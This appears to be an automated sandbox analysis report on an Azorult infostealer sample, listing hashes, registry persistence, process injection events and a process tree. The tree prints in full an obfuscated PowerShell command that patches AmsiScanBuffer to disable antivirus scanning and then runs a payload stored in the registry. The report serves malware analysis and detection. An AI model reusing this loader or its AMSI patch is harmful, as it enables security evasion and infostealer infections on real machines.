azorult | d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
05-06-2024 14:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe
Size

219KB
MD5

8816d5e592685626fbbfdb1b1b309d79
SHA1

650de5fc16a287c7801742ec92a2cc1ae7fcf4e8
SHA256

d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad
SHA512

323dcf2b6de01767912a05abb93f97c12667b450ad97274babdb8b58248b36c6578e249aec1066bb8afe9568fe450e54795458149d53b71204e312bb8c90bf7f
SSDEEP

3072:8OJNjggfyKg0KggLV0FOhJirBwtHwwEJx5Ehl/Qs7GzrlKFHZWazC3ayZyn+q/wD:5H10CtAbe

Score

10^/10

azorult infostealer persistence trojan

Malware Config

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3076 created 612	3076	powershell.EXE	5

Executes dropped EXE 2 IoCs

pid	Process
3232	$770fe406
3104	$7718874d

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Ygoev = "C:\\Users\\Admin\\AppData\\Roaming\\$77Ygoev.exe"	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe

Drops file in System32 directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4380 set thread context of 3232	4380	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	93
PID 3076 set thread context of 4292	3076	powershell.EXE	96
PID 4380 set thread context of 3104	4380	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	97

Modifies data under HKEY_USERS 56 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1717598132"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 05 Jun 2024 14:35:33 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={5F0B4E25-C197-477A-B271-FB7E2F1690C0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3076	powershell.EXE
3076	powershell.EXE
3076	powershell.EXE
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe
4292	dllhost.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	4380	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe
Token: SeDebugPrivilege	3076	powershell.EXE
Token: SeDebugPrivilege	3076	powershell.EXE
Token: SeDebugPrivilege	4292	dllhost.exe
Token: SeDebugPrivilege	4380	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe
Token: SeShutdownPrivilege	316	dwm.exe
Token: SeCreatePagefilePrivilege	316	dwm.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3524	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4380 wrote to memory of 3232	4380	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	93
PID 4380 wrote to memory of 3232	4380	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	93
PID 4380 wrote to memory of 3232	4380	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	93
PID 4380 wrote to memory of 3232	4380	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	93
PID 4380 wrote to memory of 3232	4380	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	93
PID 4380 wrote to memory of 3232	4380	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	93
PID 4380 wrote to memory of 3232	4380	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	93
PID 4380 wrote to memory of 3232	4380	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	93
PID 4380 wrote to memory of 3232	4380	d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad.exe	93
PID 3076 wrote to memory of 4292	3076	powershell.EXE	96
PID 3076 wrote to memory of 4292	3076	powershell.EXE	96
PID 3076 wrote to memory of 4292	3076	powershell.EXE	96
PID 3076 wrote to memory of 4292	3076	powershell.EXE	96
PID 3076 wrote to memory of 4292	3076	powershell.EXE	96
PID 3076 wrote to memory of 4292	3076	powershell.EXE	96
PID 3076 wrote to memory of 4292	3076	powershell.EXE	96
PID 3076 wrote to memory of 4292	3076	powershell.EXE	96
PID 4292 wrote to memory of 612	4292	dllhost.exe	5
PID 4292 wrote to memory of 672	4292	dllhost.exe	7
PID 4292 wrote to memory of 952	4292	dllhost.exe	12
PID 4292 wrote to memory of 316	4292	dllhost.exe	13
PID 4292 wrote to memory of 444	4292	dllhost.exe	14
PID 4292 wrote to memory of 432	4292	dllhost.exe	15
PID 4292 wrote to memory of 1080	4292	dllhost.exe	17
PID 4292 wrote to memory of 1092	4292	dllhost.exe	18
PID 4292 wrote to memory of 1116	4292	dllhost.exe	19
PID 4292 wrote to memory of 1236	4292	dllhost.exe	20
PID 4292 wrote to memory of 1256	4292	dllhost.exe	21
PID 4292 wrote to memory of 1368	4292	dllhost.exe	22
PID 4292 wrote to memory of 1412	4292	dllhost.exe	23
PID 4292 wrote to memory of 1420	4292	dllhost.exe	24
PID 4292 wrote to memory of 1476	4292	dllhost.exe	25
PID 4292 wrote to memory of 1504	4292	dllhost.exe	26
PID 4292 wrote to memory of 1552	4292	dllhost.exe	27
PID 4292 wrote to memory of 1656	4292	dllhost.exe	28
PID 4292 wrote to memory of 1696	4292	dllhost.exe	29
PID 4292 wrote to memory of 1716	4292	dllhost.exe	30
PID 4292 wrote to memory of 1804	4292	dllhost.exe	31
PID 4292 wrote to memory of 1872	4292	dllhost.exe	32
PID 4292 wrote to memory of 1880	4292	dllhost.exe	33
PID 4292 wrote to memory of 1908	4292	dllhost.exe	34
PID 4292 wrote to memory of 1920	4292	dllhost.exe	35
PID 4292 wrote to memory of 1960	4292	dllhost.exe	36
PID 4292 wrote to memory of 1468	4292	dllhost.exe	37
PID 4292 wrote to memory of 2052	4292	dllhost.exe	39
PID 4292 wrote to memory of 2192	4292	dllhost.exe	40
PID 4292 wrote to memory of 2364	4292	dllhost.exe	41
PID 4292 wrote to memory of 2376	4292	dllhost.exe	42
PID 4292 wrote to memory of 2444	4292	dllhost.exe	43
PID 4292 wrote to memory of 2456	4292	dllhost.exe	44
PID 4292 wrote to memory of 2532	4292	dllhost.exe	45
PID 4292 wrote to memory of 2556	4292	dllhost.exe	46
PID 4292 wrote to memory of 2588	4292	dllhost.exe	47
PID 4292 wrote to memory of 2600	4292	dllhost.exe	48
PID 4292 wrote to memory of 2928	4292	dllhost.exe	49
PID 4292 wrote to memory of 2936	4292	dllhost.exe	50
PID 4292 wrote to memory of 3024	4292	dllhost.exe	51
PID 4292 wrote to memory of 2552	4292	dllhost.exe	52
PID 4292 wrote to memory of 2684	4292	dllhost.exe	54
PID 4292 wrote to memory of 3428	4292	dllhost.exe	55
PID 4292 wrote to memory of 3524	4292	dllhost.exe	56
PID 4292 wrote to memory of 3640	4292	dllhost.exe	57
PID 4292 wrote to memory of 3844	4292	dllhost.exe	58
PID 4292 wrote to memory of 4004	4292	dllhost.exe	60

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:316
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9bc76c0d-bd9a-4b40-86cb-871532e07bfb}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4292

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:444

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:432

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1116
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:RWnXutyghmWc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$iuOSDFwEcUMHCb,[Parameter(Position=1)][Type]$wXRJSuHmYH)$kfHVfRqglrA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+'e'+'l'+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+'M'+'o'+'d'+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+'le'+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+'ns'+'i'+''+[Char](67)+'la'+'s'+'s'+','+''+[Char](65)+'ut'+[Char](111)+'C'+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$kfHVfRqglrA.DefineConstructor(''+[Char](82)+''+[Char](84)+'Spec'+'i'+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+',P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$iuOSDFwEcUMHCb).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+',Mana'+'g'+''+[Char](101)+''+[Char](100)+'');$kfHVfRqglrA.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+'H'+'i'+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+[Char](101)+'w'+'S'+''+[Char](108)+'ot'+','+''+'V'+'i'+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$wXRJSuHmYH,$iuOSDFwEcUMHCb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+'M'+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $kfHVfRqglrA.CreateType();}$mZRRRLwQXtubI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+'l'+'l')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+'eNa'+[Char](116)+''+[Char](105)+'v'+'e'+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$hkZHJmosJqiHMO=$mZRRRLwQXtubI.GetMethod(''+'G'+'e'+'t'+''+[Char](80)+'r'+'o'+'c'+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+'S'+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JqKUpzADKwaZXffEzSe=RWnXutyghmWc @([String])([IntPtr]);$CaWxKPAoZKzHdLDmgrWeiy=RWnXutyghmWc @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zznJvdDAZGf=$mZRRRLwQXtubI.GetMethod('G'+'e'+''+'t'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'nd'+'l'+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+'e'+'l'+''+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+'l'+'')));$nuLDlgXoIKoBCn=$hkZHJmosJqiHMO.Invoke($Null,@([Object]$zznJvdDAZGf,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'yA')));$VMjkjmteaBNqQqsTF=$hkZHJmosJqiHMO.Invoke($Null,@([Object]$zznJvdDAZGf,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+'alP'+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$aWctrmx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nuLDlgXoIKoBCn,$JqKUpzADKwaZXffEzSe).Invoke('a'+'m'+''+[Char](115)+'i'+'.'+''+'d'+''+[Char](108)+'l');$zIHiHjqZGgJuyjRyq=$hkZHJmosJqiHMO.Invoke($Null,@([Object]$aWctrmx,[Object](''+'A'+''+'m'+''+'s'+''+'i'+''+[Char](83)+'c'+[Char](97)+'nB'+[Char](117)+'f'+[Char](102)+'er')));$mfXBLKYvWP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VMjkjmteaBNqQqsTF,$CaWxKPAoZKzHdLDmgrWeiy).Invoke($zIHiHjqZGgJuyjRyq,[uint32]8,4,[ref]$mfXBLKYvWP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zIHiHjqZGgJuyjRyq,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VMjkjmteaBNqQqsTF,$CaWxKPAoZKzHdLDmgrWeiy).Invoke($zIHiHjqZGgJuyjRyq,[uint32]8,0x20,[ref]$mfXBLKYvWP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+'T'+''+[Char](87)+''+'A'+'R'+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1236

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1420
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1476

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1656

C:\Windows\System32\svchost.exe
